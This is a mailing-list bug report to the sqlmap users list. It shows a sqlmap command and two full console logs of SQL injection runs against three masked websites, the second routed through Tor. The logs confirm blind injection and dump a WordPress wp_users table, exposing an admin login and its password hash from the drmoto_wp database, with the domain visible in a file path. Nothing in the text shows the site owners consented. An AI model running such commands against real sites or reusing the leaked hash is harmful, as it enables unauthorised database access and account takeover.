The command line I used was sqlmap.py -m test-urls.txt -Twp_users
-Cid,user_login,user_pass --dump --stop 1 --answer="crack=N" -p id
--technique=B  --null-connection --batch > test-urls-output.txt

When processing a list of urls from a file, sqlmap retrieves the
database name from the first url and the uses this database name when
trying to retrieve column names for all other urls.

For example in the attachment test-url-a48948_1.txt the first database
name retrieved was 'a48948_1', sqlmap tried to retrieve columns names
for the database a48948_1 in all following urls and failed.

In the attachment test-urls-drmoto_wp.txt the first database name to be
retrieved was 'drmoto_wp', then sqlmap tried to retrieve columns names
for the database a48948_1 in all following urls.

The file test-urls.txt  in these two runs contained the same 3 urls,
just in different order.


    sqlmap/1.0-dev-50ac3aa - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior 
mutual consent is illegal. It is the end user's responsibility to obey all 
applicable local, state and federal laws. Developers assume no liability and 
are not responsible for any misuse or damage caused by this program

[*] starting at 00:53:07

[00:53:07] [INFO] parsing multiple targets list from 'test-urls.txt'
[00:53:07] [INFO] sqlmap got a total of 3 targets

url 1:
GET 
http://************************************************************************
do you want to test this url? [Y/n/q]
> Y
[00:53:07] [INFO] testing url 
'*************************************************************'
[00:53:07] [INFO] flushing session file
[00:53:07] [INFO] using 'D:\Soft\sqlmap-dev\output\results-04072013_1253am.csv' 
as the CSV results file in multiple targets mode
[00:53:07] [INFO] testing connection to the target url

[00:53:08] [INFO] testing if the url is stable. This can take a couple of 
seconds
[00:53:12] [WARNING] reflective value(s) found and filtering out
[00:53:12] [WARNING] heuristic (basic) test shows that GET parameter 'id' might 
not be injectable
[00:53:12] [INFO] testing for SQL injection on GET parameter 'id'
[00:53:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:53:18] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or 
HAVING clause' injectable 
[00:53:29] [INFO] heuristic (extended) test shows that the back-end DBMS could 
be 'MySQL' 

do you want to include all tests for 'MySQL' extending provided level (1) and 
risk (1)? [Y/n] Y
[00:53:29] [INFO] checking if the injection point on GET parameter 'id' is a 
false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if 
any)? [y/N] N
sqlmap identified the following injection points with a total of 18 HTTP(s) 
requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: *********************************************************8
---

do you want to exploit this SQL injection? [Y/n] Y
[00:53:36] [INFO] testing MySQL
[00:53:37] [INFO] confirming MySQL
[00:53:39] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[00:53:39] [WARNING] missing database parameter. sqlmap is going to use the 
current database to enumerate table(s) entries
[00:53:39] [INFO] fetching current database
[00:53:39] [WARNING] running in a single-thread mode. Please consider usage of 
option '--threads' for faster data retrieval

[00:53:39] [INFO] retrieved: a48948_1
[00:55:03] [INFO] fetching columns 'id, user_login, user_pass' for table 
'wp_users' in database 'a48948_1'

[00:55:03] [INFO] retrieved: 0
[00:55:13] [ERROR] unable to retrieve the number of columns for table 
'wp_users' in database 'a48948_1'
[00:55:13] [WARNING] unable to retrieve column names for table 'wp_users' in 
database 'a48948_1'
[00:55:13] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for 
table 'wp_users' in database 'a48948_1'
[00:55:13] [INFO] fetching number of column(s) 'id, user_login, user_pass' 
entries for table 'wp_users' in database 'a48948_1'

[00:55:13] [INFO] retrieved: 
[00:55:18] [WARNING] in case of continuous data retrieval problems you are 
advised to try a switch '--no-cast' or switch '--hex'
[00:55:18] [WARNING] unable to retrieve the number of column(s) 'id, 
user_login, user_pass' entries for table 'wp_users' in database 'a48948_1'

url 2:
GET http://**************************************************
do you want to test this url? [Y/n/q]
> Y
[00:55:38] [INFO] testing url 
'http://*************************************************'
[00:55:38] [INFO] testing connection to the target url
[00:55:39] [INFO] testing if the url is stable. This can take a couple of 
seconds
[00:55:41] [INFO] url is stable
[00:55:41] [WARNING] reflective value(s) found and filtering out
[00:55:41] [WARNING] heuristic (basic) test shows that GET parameter 'id' might 
not be injectable
[00:55:41] [INFO] testing for SQL injection on GET parameter 'id'
[00:55:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:55:45] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or 
HAVING clause' injectable 
[00:55:51] [INFO] heuristic (extended) test shows that the back-end DBMS could 
be 'MySQL' 

do you want to include all tests for 'MySQL' extending provided level (1) and 
risk (1)? [Y/n] Y
[00:55:51] [INFO] checking if the injection point on GET parameter 'id' is a 
false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if 
any)? [y/N] N
sqlmap identified the following injection points with a total of 18 HTTP(s) 
requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: *****************************************************************
---

do you want to exploit this SQL injection? [Y/n] Y
[00:55:54] [INFO] testing MySQL
[00:55:55] [INFO] confirming MySQL
[00:55:56] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[00:55:56] [INFO] fetching columns 'id, user_login, user_pass' for table 
'wp_users' in database 'a48948_1'
[00:55:56] [WARNING] running in a single-thread mode. Please consider usage of 
option '--threads' for faster data retrieval

[00:55:56] [INFO] retrieved: 0
[00:56:01] [ERROR] unable to retrieve the number of columns for table 
'wp_users' in database 'a48948_1'
[00:56:01] [WARNING] unable to retrieve column names for table 'wp_users' in 
database 'a48948_1'
[00:56:01] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for 
table 'wp_users' in database 'a48948_1'
[00:56:01] [INFO] fetching number of column(s) 'id, user_login, user_pass' 
entries for table 'wp_users' in database 'a48948_1'

[00:56:01] [INFO] retrieved: 
[00:56:03] [WARNING] in case of continuous data retrieval problems you are 
advised to try a switch '--no-cast' or switch '--hex'
[00:56:03] [WARNING] unable to retrieve the number of column(s) 'id, 
user_login, user_pass' entries for table 'wp_users' in database 'a48948_1'

url 3:
GET http://********************************************************
do you want to test this url? [Y/n/q]
> Y
[00:56:03] [INFO] testing url 
'http://**************************************************'
[00:56:03] [INFO] flushing session file
[00:56:03] [INFO] testing connection to the target url
[00:56:03] [INFO] testing if the url is stable. This can take a couple of 
seconds
[00:56:05] [INFO] url is stable
[00:56:06] [WARNING] reflective value(s) found and filtering out
[00:56:06] [WARNING] heuristic (basic) test shows that GET parameter 'id' might 
not be injectable
[00:56:06] [INFO] testing for SQL injection on GET parameter 'id'
[00:56:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:56:11] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or 
HAVING clause' injectable 
[00:56:17] [INFO] heuristic (extended) test shows that the back-end DBMS could 
be 'MySQL' 

do you want to include all tests for 'MySQL' extending provided level (1) and 
risk (1)? [Y/n] Y
[00:56:17] [INFO] checking if the injection point on GET parameter 'id' is a 
false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if 
any)? [y/N] N
sqlmap identified the following injection points with a total of 18 HTTP(s) 
requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: **********************************************************
---

do you want to exploit this SQL injection? [Y/n] Y
[00:56:20] [INFO] testing MySQL
[00:56:21] [INFO] confirming MySQL
[00:56:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL >= 5.0.0
[00:56:22] [INFO] fetching columns 'id, user_login, user_pass' for table 
'wp_users' in database 'a48948_1'
[00:56:22] [WARNING] running in a single-thread mode. Please consider usage of 
option '--threads' for faster data retrieval

[00:56:22] [INFO] retrieved: 0
[00:56:31] [ERROR] unable to retrieve the number of columns for table 
'wp_users' in database 'a48948_1'
[00:56:31] [WARNING] unable to retrieve column names for table 'wp_users' in 
database 'a48948_1'
[00:56:31] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for 
table 'wp_users' in database 'a48948_1'
[00:56:31] [INFO] fetching number of column(s) 'id, user_login, user_pass' 
entries for table 'wp_users' in database 'a48948_1'

[00:56:31] [INFO] retrieved: 
[00:56:33] [WARNING] in case of continuous data retrieval problems you are 
advised to try a switch '--no-cast' or switch '--hex'
[00:56:33] [WARNING] unable to retrieve the number of column(s) 'id, 
user_login, user_pass' entries for table 'wp_users' in database 'a48948_1'
[00:56:33] [INFO] you can find results of scanning in multiple targets mode 
inside the CSV file 'D:\Soft\sqlmap-dev\output\results-04072013_1253am.csv'

[*] shutting down at 00:56:33

    sqlmap/1.0-dev-50ac3aa - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior 
mutual consent is illegal. It is the end user's responsibility to obey all 
applicable local, state and federal laws. Developers assume no liability and 
are not responsible for any misuse or damage caused by this program

[*] starting at 12:35:21

[12:35:21] [WARNING] increasing default value for option '--time-sec' to 10 
because switch '--tor' was provided
[12:35:21] [INFO] setting Tor HTTP proxy settings
[12:35:22] [WARNING] use switch '--check-tor' at your own convenience when 
accessing Tor anonymizing network because of known issues with default settings 
of various 'bundles' (e.g. Vidalia)
[12:35:22] [INFO] parsing multiple targets list from 'test-urls.txt'
[12:35:22] [INFO] sqlmap got a total of 3 targets

url 1:
GET http://**********************************************************
do you want to test this url? [Y/n/q]
> Y
[12:35:22] [INFO] testing url 
'http://************************************************'
[12:35:22] [INFO] using 'D:\Soft\sqlmap-dev\output\results-04072013_1235pm.csv' 
as the CSV results file in multiple targets mode
[12:35:22] [INFO] testing connection to the target url
[12:35:24] [INFO] testing NULL connection to the target url
[12:35:28] [INFO] testing if the url is stable. This can take a couple of 
seconds
[12:35:31] [INFO] url is stable
[12:35:33] [WARNING] reflective value(s) found and filtering out
[12:35:33] [WARNING] heuristic (basic) test shows that GET parameter 'id' might 
not be injectable
[12:35:33] [INFO] testing for SQL injection on GET parameter 'id'
[12:35:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:35:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or 
HAVING clause' injectable 
[12:36:16] [INFO] checking if the injection point on GET parameter 'id' is a 
false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if 
any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s) 
requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: 
*********************************************************************
---

do you want to exploit this SQL injection? [Y/n] Y
[12:36:32] [INFO] testing MySQL
[12:36:36] [INFO] confirming MySQL
[12:36:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[12:36:42] [WARNING] missing database parameter. sqlmap is going to use the 
current database to enumerate table(s) entries
[12:36:42] [INFO] fetching current database
[12:36:42] [WARNING] running in a single-thread mode. Please consider usage of 
option '--threads' for faster data retrieval

[12:36:42] [INFO] retrieved: drmoto_wp
[12:41:22] [INFO] fetching columns 'id, user_login, user_pass' for table 
'wp_users' in database 'drmoto_wp'

[12:41:22] [INFO] retrieved: 3

[12:41:46] [INFO] retrieved: ID

[12:42:41] [INFO] retrieved: user_login

[12:47:44] [INFO] retrieved: user_pass
[12:52:25] [INFO] fetching entries of column(s) 'ID, user_login, user_pass' for 
table 'wp_users' in database 'drmoto_wp'
[12:52:25] [INFO] fetching number of column(s) 'ID, user_login, user_pass' 
entries for table 'wp_users' in database 'drmoto_wp'

[12:52:25] [INFO] retrieved: 13

[12:53:19] [INFO] retrieved: 1

[12:54:30] [INFO] retrieved: 

[12:55:16] [INFO] heuristics detected web page charset 'ascii'
admin

[12:57:06] [INFO] retrieved: $P$B9UA6Ixzu72k/sWNnw2i8SJSOAxghQ.
[13:08:20] [INFO] analyzing table dump for possible password hashes
[13:08:20] [INFO] recognized possible password hashes in column 'user_pass'
[13:08:20] [INFO] writing hashes to file 
'd:\soft\sqlmap-dev\sqlmaphashes-ib3psp.txt' for eventual further processing 
with other tools
[13:08:20] [INFO] do you want to crack them via a dictionary-based attack? 
[y/N/q] N
Database: drmoto_wp
Table: wp_users
[1 entry]
+----+------------------------------------+------------+
| ID | user_pass                          | user_login |
+----+------------------------------------+------------+
| 1  | $P$B9UA6Ixzu72k/sWNnw2i8SJSOAxghQ. | admin      |
+----+------------------------------------+------------+

[13:08:20] [INFO] table 'drmoto_wp.wp_users' dumped to CSV file 
'D:\Soft\sqlmap-dev\output\drmoto.ru\dump\drmoto_wp\wp_users.csv'
[13:08:20] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 1 times

url 2:
GET http://***************************************************************
do you want to test this url? [Y/n/q]
> Y
[13:08:20] [INFO] testing url 
'************************************************************'
[13:08:20] [INFO] testing connection to the target url
[13:08:24] [INFO] testing NULL connection to the target url
[13:08:27] [INFO] testing if the url is stable. This can take a couple of 
seconds
[13:08:30] [INFO] url is stable
[13:08:34] [WARNING] reflective value(s) found and filtering out
[13:08:34] [WARNING] heuristic (basic) test shows that GET parameter 'id' might 
not be injectable
[13:08:34] [INFO] testing for SQL injection on GET parameter 'id'
[13:08:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:08:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or 
HAVING clause' injectable 
[13:09:06] [INFO] checking if the injection point on GET parameter 'id' is a 
false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if 
any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s) 
requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ******************************************************
---

do you want to exploit this SQL injection? [Y/n] Y
[13:09:15] [INFO] testing MySQL
[13:09:18] [INFO] confirming MySQL
[13:09:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL >= 5.0.0
[13:09:21] [INFO] fetching columns 'id, user_login, user_pass' for table 
'wp_users' in database 'drmoto_wp'
[13:09:21] [WARNING] running in a single-thread mode. Please consider usage of 
option '--threads' for faster data retrieval

[13:09:21] [INFO] retrieved: 0
[13:09:38] [ERROR] unable to retrieve the number of columns for table 
'wp_users' in database 'drmoto_wp'
[13:09:38] [WARNING] unable to retrieve column names for table 'wp_users' in 
database 'drmoto_wp'
[13:09:38] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for 
table 'wp_users' in database 'drmoto_wp'
[13:09:38] [INFO] fetching number of column(s) 'id, user_login, user_pass' 
entries for table 'wp_users' in database 'drmoto_wp'

[13:09:38] [INFO] retrieved: 
[13:09:49] [WARNING] in case of continuous data retrieval problems you are 
advised to try a switch '--no-cast' or switch '--hex'
[13:09:49] [WARNING] unable to retrieve the number of column(s) 'id, 
user_login, user_pass' entries for table 'wp_users' in database 'drmoto_wp'

url 3:
GET 
http://*******************************************************************************
do you want to test this url? [Y/n/q]
> Y
[13:09:49] [INFO] testing url 
'**********************************************************88'
[13:09:49] [INFO] testing connection to the target url

[13:09:52] [INFO] testing NULL connection to the target url
[13:09:57] [INFO] testing if the url is stable. This can take a couple of 
seconds
[13:10:04] [WARNING] reflective value(s) found and filtering out
[13:10:04] [WARNING] heuristic (basic) test shows that GET parameter 'id' might 
not be injectable
[13:10:04] [INFO] testing for SQL injection on GET parameter 'id'
[13:10:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:10:23] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or 
HAVING clause' injectable 
[13:10:52] [INFO] checking if the injection point on GET parameter 'id' is a 
false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if 
any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s) 
requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: 
***********************************************************************
---

do you want to exploit this SQL injection? [Y/n] Y
[13:11:08] [INFO] testing MySQL
[13:11:10] [INFO] confirming MySQL
[13:11:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[13:11:16] [INFO] fetching columns 'id, user_login, user_pass' for table 
'wp_users' in database 'drmoto_wp'
[13:11:16] [WARNING] running in a single-thread mode. Please consider usage of 
option '--threads' for faster data retrieval

[13:11:16] [INFO] retrieved: 0
[13:11:41] [ERROR] unable to retrieve the number of columns for table 
'wp_users' in database 'drmoto_wp'
[13:11:41] [WARNING] unable to retrieve column names for table 'wp_users' in 
database 'drmoto_wp'
[13:11:41] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for 
table 'wp_users' in database 'drmoto_wp'
[13:11:41] [INFO] fetching number of column(s) 'id, user_login, user_pass' 
entries for table 'wp_users' in database 'drmoto_wp'

[13:11:41] [INFO] retrieved: 
[13:11:56] [WARNING] in case of continuous data retrieval problems you are 
advised to try a switch '--no-cast' or switch '--hex'
[13:11:56] [WARNING] unable to retrieve the number of column(s) 'id, 
user_login, user_pass' entries for table 'wp_users' in database 'drmoto_wp'
[13:11:56] [INFO] you can find results of scanning in multiple targets mode 
inside the CSV file 'D:\Soft\sqlmap-dev\output\results-04072013_1235pm.csv'

[*] shutting down at 13:11:56

------------------------------------------------------------------------------
Minimize network downtime and maximize team effectiveness.
Reduce network management and security costs.Learn how to hire 
the most talented Cisco Certified professionals. Visit the 
Employer Resources Portal
http://www.cisco.com/web/learning/employer_resources/index.html
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to